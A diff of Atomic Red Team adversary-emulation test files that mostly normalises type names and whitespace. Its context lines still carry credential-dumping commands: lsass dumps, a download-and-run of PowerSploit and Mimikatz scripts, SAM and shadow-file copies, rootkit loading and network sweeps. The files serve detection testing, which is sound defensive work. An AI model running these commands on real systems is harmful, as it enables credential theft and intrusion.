diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 9c1fcdd6..f6ff35f9 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -15,11 +15,11 @@ atomic_tests: input_arguments: output_file: description: Path where resulting dump should be placed - type: Path + type: path default: C:\Windows\Temp\lsass_dump.dmp procdump_exe: description: Path of Procdump executable - type: Path + type: path default: PathToAtomicsFolder\T1003.001\bin\procdump.exe dependency_executor_name: powershell dependencies: @@ -69,7 +69,7 @@ atomic_tests: input_arguments: dumpert_exe: description: Path of Dumpert executable - type: Path + type: path default: PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe dependency_executor_name: powershell dependencies: @@ -88,12 +88,12 @@ atomic_tests: del C:\windows\temp\dumpert.dmp >nul 2> nul name: command_prompt elevation_required: true - + - name: Dump LSASS.exe Memory using NanoDump auto_generated_guid: dddd4aca-bbed-46f0-984d-e4c5971c51ea description: | The NanoDump tool uses syscalls and an invalid dump signature to avoid detection. - + https://github.com/helpsystems/nanodump Upon successful execution, you should find the nanondump.dmp file in the temp directory @@ -146,11 +146,11 @@ atomic_tests: input_arguments: input_file: description: Path of the Lsass dump - type: Path + type: path default: '%tmp%\lsass.DMP' mimikatz_exe: description: Path of the Mimikatz binary - type: String + type: string default: PathToAtomicsFolder\T1003.001\bin\x64\mimikatz.exe dependency_executor_name: powershell dependencies: @@ -224,8 +224,8 @@ atomic_tests: - windows executor: command: | - [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: | Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore name: powershell @@ -244,11 +244,11 @@ atomic_tests: input_arguments: output_file: description: Path where resulting dump should be placed - type: Path + type: path default: C:\Windows\Temp\lsass_dump.dmp procdump_exe: description: Path of Procdump executable - type: Path + type: path default: PathToAtomicsFolder\T1003.001\bin\procdump.exe dependency_executor_name: powershell dependencies: @@ -280,7 +280,7 @@ atomic_tests: input_arguments: remote_script: description: URL to a remote Mimikatz script that dumps credentials - type: Url + type: url default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1 executor: command: | @@ -291,7 +291,7 @@ atomic_tests: auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 description: | Use createdump executable from .NET to create an LSASS dump. - + [Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20) supported_platforms: - windows @@ -311,7 +311,7 @@ atomic_tests: cleanup_command: | Remove-Item $env:Temp\dotnet-lsass.dmp -ErrorAction Ignore name: powershell - elevation_required: true + elevation_required: true - name: Dump LSASS.exe using imported Microsoft DLLs auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697 description: | @@ -325,11 +325,11 @@ atomic_tests: input_arguments: xordump_exe: description: Path to xordump - type: Path + type: path default: C:\Windows\Temp\xordump.exe output_file: description: Path where resulting dump should be placed - type: Path + type: path default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp dependencies: - description: | diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index bd20f50d..158ff58a 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml @@ -66,15 +66,15 @@ atomic_tests: input_arguments: file_path: description: Path to the file to copy - type: Path + type: path default: '%SystemRoot%/system32/config/SAM' file_name: description: Name of the copied file - type: String + type: string default: SAM copy_dest: description: Destination of the copied file - type: String + type: string default: '%temp%' executor: command: | @@ -83,7 +83,7 @@ atomic_tests: elevation_required: true cleanup_command: | del #{copy_dest}\#{file_name} >nul 2>&1 - + - name: PowerDump Hashes and Usernames from Registry auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 description: Executes a hashdump by reading the hashes from the registry. @@ -112,17 +112,17 @@ atomic_tests: input_arguments: target_hive: description: Hive you wish to dump - type: String + type: string default: SAM limit: description: Limit to the number of shadow copies to iterate through when trying to copy the hive - type: Integer + type: integer default: 10 executor: command: | for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) && dir /B %temp%\#{target_hive}vss%a name: command_prompt - elevation_required: false + elevation_required: false cleanup_command: | for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1) @@ -135,11 +135,11 @@ atomic_tests: input_arguments: target_hive: description: Hive you wish to dump - type: String + type: string default: SAM limit: description: Limit to the number of shadow copies to iterate through when trying to copy the hive - type: Integer + type: integer default: 10 executor: command: | @@ -148,12 +148,12 @@ atomic_tests: ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore } name: powershell - elevation_required: false + elevation_required: false cleanup_command: | 1..#{limit} | % { rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore } - + - name: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes auto_generated_guid: 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb description: Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn diff --git a/atomics/T1003.003/T1003.003.yaml b/atomics/T1003.003/T1003.003.yaml index 83c266aa..02bb903f 100644 --- a/atomics/T1003.003/T1003.003.yaml +++ b/atomics/T1003.003/T1003.003.yaml @@ -12,7 +12,7 @@ atomic_tests: input_arguments: drive_letter: description: Drive letter to source VSC (including colon) - type: String + type: string default: 'C:' dependencies: - description: | @@ -42,11 +42,11 @@ atomic_tests: input_arguments: vsc_name: description: Name of Volume Shadow Copy - type: String + type: string default: '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1' extract_path: description: Path for extracted NTDS.dit - type: Path + type: path default: C:\Windows\Temp dependencies: - description: | @@ -94,7 +94,7 @@ atomic_tests: input_arguments: output_folder: description: Path where resulting dump should be placed - type: Path + type: path default: C:\Windows\Temp\ntds_T1003 dependencies: - description: | @@ -123,7 +123,7 @@ atomic_tests: input_arguments: drive_letter: description: Drive letter to source VSC (including colon and backslash) - type: String + type: string default: 'C:\' dependencies: - description: | @@ -148,11 +148,11 @@ atomic_tests: input_arguments: drive_letter: description: Drive letter to source VSC (including colon and backslash) - type: String + type: string default: 'C:\' target_host: description: IP Address / Hostname you want to target - type: String + type: string default: localhost dependencies: - description: | @@ -177,15 +177,15 @@ atomic_tests: input_arguments: source_path: description: File to shadow copy - type: String + type: string default: 'c:\windows\ntds\ntds.dit' target_path: description: Target path of the result file - type: String + type: string default: 'c:\ntds.dit' target_host: description: IP Address / Hostname you want to target - type: String + type: string default: localhost dependencies: - description: | @@ -211,7 +211,7 @@ atomic_tests: input_arguments: drive_letter: description: Drive letter to source VSC (including colon) - type: String + type: string default: 'C:\' executor: command: | @@ -230,11 +230,11 @@ atomic_tests: input_arguments: drive_letter: description: Drive letter to source VSC (including colon) - type: String + type: string default: 'C:' symlink_path: description: symlink path - type: String + type: string default: 'C:\Temp\vssstore' executor: command: | diff --git a/atomics/T1003.004/T1003.004.yaml b/atomics/T1003.004/T1003.004.yaml index ee5b43a5..a2c915c1 100644 --- a/atomics/T1003.004/T1003.004.yaml +++ b/atomics/T1003.004/T1003.004.yaml @@ -13,7 +13,7 @@ atomic_tests: input_arguments: psexec_exe: description: Path to PsExec executable - type: Path + type: path default: PathToAtomicsFolder\T1003.004\bin\PsExec.exe dependency_executor_name: powershell dependencies: diff --git a/atomics/T1003.006/T1003.006.yaml b/atomics/T1003.006/T1003.006.yaml index 0020c7f2..f1342c9d 100644 --- a/atomics/T1003.006/T1003.006.yaml +++ b/atomics/T1003.006/T1003.006.yaml @@ -9,19 +9,19 @@ atomic_tests: Privileges required: domain admin or domain controller account (by default), or any other account with required rights. [Reference](https://adsecurity.org/?p=1729) supported_platforms: - - windows + - windows input_arguments: domain: description: Targeted Active Directory domain - type: String + type: string default: '%userdnsdomain%' user: description: Targeted user - type: String + type: string default: krbtgt mimikatz_path: description: Mimikatz windows executable - type: Path + type: path default: '%tmp%\mimikatz\x64\mimikatz.exe' dependency_executor_name: powershell dependencies: @@ -56,7 +56,7 @@ atomic_tests: input_arguments: logonserver: description: ComputerName argument default %logonserver% - type: String + type: string default: $ENV:logonserver.TrimStart("\") dependency_executor_name: powershell dependencies: @@ -72,4 +72,4 @@ atomic_tests: command: | Get-ADReplAccount -All -Server #{logonserver} name: powershell - elevation_required: False \ No newline at end of file + elevation_required: false diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml index a5bcee80..84a02bd2 100644 --- a/atomics/T1003.007/T1003.007.yaml +++ b/atomics/T1003.007/T1003.007.yaml @@ -1,4 +1,3 @@ ---- attack_technique: T1003.007 display_name: 'OS Credential Dumping: Proc Filesystem' atomic_tests: @@ -9,31 +8,31 @@ atomic_tests: copy process memory to an external file so it can be searched or exfiltrated later. supported_platforms: - - linux + - linux input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1003.007.bin script_path: description: Path to script generating the target process - type: Path + type: path default: /tmp/T1003.007.sh pid_term: description: Unique string to use to identify target process - type: String + type: string default: T1003.007 dependencies: - - description: | - Script to launch target process must exist - prereq_command: | - test -f #{script_path} - grep "#{pid_term}" #{script_path} - get_prereq_command: | - echo '#!/bin/sh' > #{script_path} - echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} + - description: | + Script to launch target process must exist + prereq_command: | + test -f #{script_path} + grep "#{pid_term}" #{script_path} + get_prereq_command: | + echo '#!/bin/sh' > #{script_path} + echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} executor: name: sh @@ -57,41 +56,41 @@ atomic_tests: copy a process's heap memory to an external file so it can be searched or exfiltrated later. supported_platforms: - - linux + - linux input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1003.007.bin script_path: description: Path to script generating the target process - type: Path + type: path default: /tmp/T1003.007.sh python_script: description: Path to script generating the target process - type: Path + type: path default: PathToAtomicsFolder/T1003.007/src/dump_heap.py pid_term: description: Unique string to use to identify target process - type: String + type: string default: T1003.007 dependencies: - - description: | - Script to launch target process must exist - prereq_command: | - test -f #{script_path} - grep "#{pid_term}" #{script_path} - get_prereq_command: | - echo '#!/bin/sh' > #{script_path} - echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} - - description: | - Requires Python - prereq_command: | - (which python || which python3 || which python2) - get_prereq_command: | - echo "Python 2.7+ or 3.4+ must be installed" + - description: | + Script to launch target process must exist + prereq_command: | + test -f #{script_path} + grep "#{pid_term}" #{script_path} + get_prereq_command: | + echo '#!/bin/sh' > #{script_path} + echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} + - description: | + Requires Python + prereq_command: | + (which python || which python3 || which python2) + get_prereq_command: | + echo "Python 2.7+ or 3.4+ must be installed" executor: name: sh @@ -116,11 +115,11 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1003.007Test3.txt MimiPenguin_Location: description: Path of MimiPenguin script - type: Path + type: path default: /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh dependency_executor_name: sh dependencies: diff --git a/atomics/T1003.008/T1003.008.yaml b/atomics/T1003.008/T1003.008.yaml index 491690de..cc5d1454 100644 --- a/atomics/T1003.008/T1003.008.yaml +++ b/atomics/T1003.008/T1003.008.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1003.008.txt executor: command: | @@ -29,7 +29,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1003.008.txt executor: command: | @@ -43,11 +43,11 @@ atomic_tests: description: | Dump /etc/passwd and /etc/shadow using ed supported_platforms: - - linux + - linux input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1003.008.txt executor: command: | @@ -61,11 +61,11 @@ atomic_tests: description: | Dump /etc/passwd and /etc/shadow using bash builtins supported_platforms: - - linux + - linux input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1003.008.txt executor: command: | diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index ffb5bb7e..5d7c6fec 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml @@ -18,15 +18,15 @@ atomic_tests: input_arguments: gsecdump_exe: description: Path to the Gsecdump executable - type: Path + type: path default: PathToAtomicsFolder\T1003\bin\gsecdump.exe gsecdump_bin_hash: description: File hash of the Gsecdump binary file - type: String + type: string default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC gsecdump_url: description: Path to download Gsecdump binary file - type: Url + type: url default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe dependency_executor_name: powershell dependencies: @@ -58,7 +58,7 @@ atomic_tests: - windows dependency_executor_name: powershell dependencies: - - description: NPPSpy.dll must be available in local temp directory + - description: NPPSpy.dll must be available in local temp directory prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1} get_prereq_command: |- [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -85,13 +85,13 @@ atomic_tests: Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore name: powershell elevation_required: true - + - name: Dump svchost.exe to gather RDP credentials auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9 description: | The svchost.exe contains the RDP plain-text credentials. Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/ - + Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp. supported_platforms: - windows @@ -107,8 +107,8 @@ atomic_tests: - name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) auto_generated_guid: 6c7a4fd3-5b0b-4b30-a93e-39411b25d889 description: |- - AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes. - [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA) + AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes. + [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA) supported_platforms: - windows dependency_executor_name: powershell @@ -127,8 +127,8 @@ atomic_tests: - name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) auto_generated_guid: 42510244-5019-48fa-a0e5-66c3b76e6049 description: |- - AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes. - [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA) + AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes. + [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA) supported_platforms: - windows dependency_executor_name: powershell diff --git a/atomics/T1006/T1006.yaml b/atomics/T1006/T1006.yaml index 7ce8480f..286785c3 100644 --- a/atomics/T1006/T1006.yaml +++ b/atomics/T1006/T1006.yaml @@ -18,7 +18,7 @@ atomic_tests: input_arguments: volume: description: Drive letter of the volume to access - type: String + type: string default: 'C:' executor: command: | diff --git a/atomics/T1007/T1007.yaml b/atomics/T1007/T1007.yaml index ea8990aa..d439a2f3 100644 --- a/atomics/T1007/T1007.yaml +++ b/atomics/T1007/T1007.yaml @@ -27,7 +27,7 @@ atomic_tests: input_arguments: output_file: description: Path of file to hold net.exe output - type: Path + type: path default: '%temp%\service-list.txt' executor: command: | diff --git a/atomics/T1010/T1010.yaml b/atomics/T1010/T1010.yaml index 79b63730..858ff811 100644 --- a/atomics/T1010/T1010.yaml +++ b/atomics/T1010/T1010.yaml @@ -12,11 +12,11 @@ atomic_tests: input_arguments: input_source_code: description: Path to source of C# code - type: Path + type: path default: PathToAtomicsFolder\T1010\src\T1010.cs output_file_name: description: Name of output binary - type: String + type: string default: '%TEMP%\T1010.exe' dependency_executor_name: powershell dependencies: diff --git a/atomics/T1012/T1012.yaml b/atomics/T1012/T1012.yaml index d2d87354..81c0ae69 100644 --- a/atomics/T1012/T1012.yaml +++ b/atomics/T1012/T1012.yaml @@ -39,15 +39,15 @@ atomic_tests: - name: Enumerate COM Objects in Registry with Powershell auto_generated_guid: 0d80d088-a84c-4353-af1a-fc8b439f1564 description: |- - This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file. - An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes. - See: https://www.mandiant.com/resources/hunting-com-objects + This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file. + An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes. + See: https://www.mandiant.com/resources/hunting-com-objects supported_platforms: - windows input_arguments: output_file: description: File to output list of COM objects to - type: String + type: string default: $env:temp\T1592.002Test1.txt executor: command: | diff --git a/atomics/T1014/T1014.yaml b/atomics/T1014/T1014.yaml index a5cd297f..7b0483a0 100644 --- a/atomics/T1014/T1014.yaml +++ b/atomics/T1014/T1014.yaml @@ -10,15 +10,15 @@ atomic_tests: input_arguments: rootkit_source_path: description: Path to the rootkit source. Used when prerequistes are fetched. - type: Path + type: path default: PathToAtomicsFolder/T1014/src/Linux rootkit_path: description: Path To rootkit - type: String + type: string default: PathToAtomicsFolder/T1014/bin rootkit_name: description: Module name - type: String + type: string default: T1014 dependency_executor_name: bash dependencies: @@ -52,15 +52,15 @@ atomic_tests: input_arguments: rootkit_source_path: description: Path to the rootkit source. Used when prerequistes are fetched. - type: Path + type: path default: PathToAtomicsFolder/T1014/src/Linux rootkit_path: description: Path To rootkit - type: String + type: string default: PathToAtomicsFolder/T1014/bin rootkit_name: description: Module name - type: String + type: string default: T1014 dependency_executor_name: bash dependencies: @@ -95,15 +95,15 @@ atomic_tests: input_arguments: repo: description: Url of the github repo zip - type: String + type: string default: https://github.com/gianlucaborello/libprocesshider/ rev: description: Revision of the github repo zip - type: String + type: string default: 25e0587d6bf2137f8792dc83242b6b0e5a72b415 library_path: description: Full path of the library to add to ld.so.preload - type: String + type: string default: /usr/local/lib/libprocesshider.so dependency_executor_name: bash dependencies: @@ -135,19 +135,19 @@ atomic_tests: input_arguments: repo: description: Url of the diamorphine github repo - type: String + type: string default: https://github.com/m0nad/Diamorphine/ rev: description: Revision of the github repo zip - type: String + type: string default: 898810523aa2033f582a4a5903ffe453334044f9 rootkit_path: description: Path To rootkit - type: String + type: string default: /tmp/atomic/Diamorphine rootkit_name: description: Module name - type: String + type: string default: diamorphine dependency_executor_name: bash dependencies: diff --git a/atomics/T1016/T1016.yaml b/atomics/T1016/T1016.yaml index f1752424..7487524c 100644 --- a/atomics/T1016/T1016.yaml +++ b/atomics/T1016/T1016.yaml @@ -80,15 +80,15 @@ atomic_tests: input_arguments: output_file: description: Path of file to write port scan results - type: Path + type: path default: $env:USERPROFILE\Desktop\open-ports.txt portfile_url: description: URL to top-128.txt - type: Url + type: url default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt port_file: description: The path to a text file containing ports to be scanned, one port per line. The default list uses the top 128 ports as defined by Nmap. - type: Path + type: path default: PathToAtomicsFolder\T1016\src\top-128.txt dependency_executor_name: powershell dependencies: @@ -132,7 +132,7 @@ atomic_tests: name: powershell - name: Adfind - Enumerate Active Directory Subnet Objects auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: @@ -140,7 +140,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies: @@ -163,7 +163,7 @@ atomic_tests: input_arguments: recon_commands: description: File that houses list of commands to be executed - type: Path + type: path default: PathToAtomicsFolder\T1016\src\qakbot.bat dependency_executor_name: powershell dependencies: @@ -182,9 +182,9 @@ atomic_tests: auto_generated_guid: ff1d8c25-2aa4-4f18-a425-fede4a41ee88 description: | "This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows. - + Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user. - + Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out. supported_platforms: - macos @@ -203,5 +203,5 @@ atomic_tests: - windows executor: command: | - nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.$env:USERDNSDOMAIN + nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.$env:USERDNSDOMAIN name: command_prompt diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml index 29038945..37f06d8d 100644 --- a/atomics/T1018/T1018.yaml +++ b/atomics/T1018/T1018.yaml @@ -37,7 +37,7 @@ atomic_tests: input_arguments: target_domain: description: Domain to query for domain controllers - type: String + type: string default: '%userdnsdomain%' executor: command: | @@ -51,21 +51,21 @@ atomic_tests: Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout. supported_platforms: - windows - input_arguments: - start_host: - description: Last octet starting value for ping sweep. - type: String - default: "1" - stop_host: - description: Last octet ending value for ping sweep. - type: String - default: "254" - subnet: - description: Subnet used for ping sweep. - type: String - default: 192.168.1 - executor: - command: | + input_arguments: + start_host: + description: Last octet starting value for ping sweep. + type: string + default: "1" + stop_host: + description: Last octet ending value for ping sweep. + type: string + default: "254" + subnet: + description: Subnet used for ping sweep. + type: string + default: 192.168.1 + executor: + command: | for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i name: command_prompt - name: Remote System Discovery - arp @@ -113,15 +113,15 @@ atomic_tests: input_arguments: start_host: description: Subnet used for ping sweep. - type: String + type: string default: "1" stop_host: description: Subnet used for ping sweep. - type: String + type: string default: "254" subnet: description: Subnet used for ping sweep. - type: String + type: string default: 192.168.1 executor: command: | @@ -156,15 +156,15 @@ atomic_tests: input_arguments: user_name: description: username including domain. - type: String + type: string default: 'domain\user' acct_pass: description: Account password. - type: String + type: string default: "password" host_name: description: hostname or ip address to connect to. - type: String + type: string default: "192.168.1.1" dependency_executor_name: powershell dependencies: @@ -193,7 +193,7 @@ atomic_tests: elevation_required: true - name: Adfind - Enumerate Active Directory Computer Objects auto_generated_guid: a889f5be-2d54-4050-bd05-884578748bb4 - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: @@ -201,7 +201,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies: @@ -217,7 +217,7 @@ atomic_tests: name: command_prompt - name: Adfind - Enumerate Active Directory Domain Controller Objects auto_generated_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms: @@ -225,7 +225,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies: @@ -307,9 +307,9 @@ atomic_tests: - windows dependency_executor_name: powershell dependencies: - - description: This PC must be joined to a domain. + - description: This PC must be joined to a domain. prereq_command: |- - if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1} + if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1} get_prereq_command: |- write-host "This PC must be manually added to a domain." executor: @@ -373,7 +373,7 @@ atomic_tests: elevation_required: false command: | get-wmiobject -class ds_computer -namespace root\directory\ldap -- name: Remote System Discovery - net group Domain Controller +- name: Remote System Discovery - net group Domain Controller auto_generated_guid: 5843529a-5056-4bc1-9c13-a311e2af4ca0 description: | Identify remote systems with net.exe querying the Active Directory Domain Controller. diff --git a/atomics/T1020/T1020.yaml b/atomics/T1020/T1020.yaml index 56d638a0..8b6959ae 100644 --- a/atomics/T1020/T1020.yaml +++ b/atomics/T1020/T1020.yaml @@ -12,11 +12,11 @@ atomic_tests: input_arguments: file: description: Exfiltration File - type: String + type: string default: C:\temp\T1020_exfilFile.txt domain: description: Destination Domain - type: Url + type: url default: https://google.com executor: command: |- diff --git a/atomics/T1021.001/T1021.001.yaml b/atomics/T1021.001/T1021.001.yaml index fd7f2370..f9c01a5b 100644 --- a/atomics/T1021.001/T1021.001.yaml +++ b/atomics/T1021.001/T1021.001.yaml @@ -10,19 +10,19 @@ atomic_tests: input_arguments: logonserver: description: ComputerName argument default %logonserver% - type: String + type: string default: $ENV:logonserver.TrimStart("\") domain: description: domain argument default %USERDOMAIN% - type: String + type: string default: $Env:USERDOMAIN username: description: Username argument default %username% - type: String + type: string default: $ENV:USERNAME password: description: Password - type: String + type: string default: 1password2! dependencies: - description: | @@ -48,15 +48,15 @@ atomic_tests: description: | Changing RDP Port to Non Standard Port via Powershell supported_platforms: - - windows + - windows input_arguments: OLD_Remote_Port: description: Default RDP Listening Port - type: String + type: string default: "3389" NEW_Remote_Port: description: New RDP Listening Port - type: String + type: string default: "4489" executor: command: | @@ -66,21 +66,21 @@ atomic_tests: Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{OLD_Remote_Port} Remove-NetFirewallRule -DisplayName "RDPPORTLatest-TCP-In" -ErrorAction ignore name: powershell - elevation_required: true + elevation_required: true - name: Changing RDP Port to Non Standard Port via Command_Prompt auto_generated_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 description: | Changing RDP Port to Non Standard Port via Command_Prompt supported_platforms: - - windows + - windows input_arguments: OLD_Remote_Port: description: Default RDP Listening Port - type: String + type: string default: "3389" NEW_Remote_Port: description: New RDP Listening Port - type: String + type: string default: "4489" executor: command: | @@ -90,4 +90,4 @@ atomic_tests: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} -f >nul 2>&1 netsh advfirewall firewall delete rule name="RDPPORTLatest-TCP-In" >nul 2>&1 name: command_prompt - elevation_required: true + elevation_required: true diff --git a/atomics/T1021.002/T1021.002.yaml b/atomics/T1021.002/T1021.002.yaml index aae1b061..7b2d71ab 100644 --- a/atomics/T1021.002/T1021.002.yaml +++ b/atomics/T1021.002/T1021.002.yaml @@ -10,19 +10,19 @@ atomic_tests: input_arguments: user_name: description: Username - type: String + type: string default: DOMAIN\Administrator share_name: description: Examples C$, IPC$, Admin$ - type: String + type: string default: C$ password: description: Password - type: String + type: string default: P@ssw0rd1 computer_name: description: Target Computer Name - type: String + type: string default: Target executor: command: | @@ -37,15 +37,15 @@ atomic_tests: input_arguments: share_name: description: Examples C$, IPC$, Admin$ - type: String + type: string default: C$ map_name: description: Mapped Drive Letter - type: String + type: string default: g computer_name: description: Target Computer Name - type: String + type: string default: Target executor: command: | @@ -60,11 +60,11 @@ atomic_tests: input_arguments: command_path: description: File to copy and execute - type: Path + type: path default: C:\Windows\System32\cmd.exe remote_host: description: Remote computer to receive the copy and execute the file - type: String + type: string default: '\\localhost' psexec_exe: description: Path to PsExec @@ -96,16 +96,14 @@ atomic_tests: input_arguments: output_file: description: Remote computer to receive the copy and execute the file - type: String + type: string default: output.txt command_to_execute: description: Command to execute for output. - type: String + type: string default: hostname executor: command: | cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1 name: command_prompt elevation_required: true - - diff --git a/atomics/T1021.003/T1021.003.yaml b/atomics/T1021.003/T1021.003.yaml index 69b11217..233c88eb 100644 --- a/atomics/T1021.003/T1021.003.yaml +++ b/atomics/T1021.003/T1021.003.yaml @@ -16,7 +16,7 @@ atomic_tests: input_arguments: computer_name: description: Name of Computer - type: String + type: string default: localhost executor: command: | diff --git a/atomics/T1021.006/T1021.006.yaml 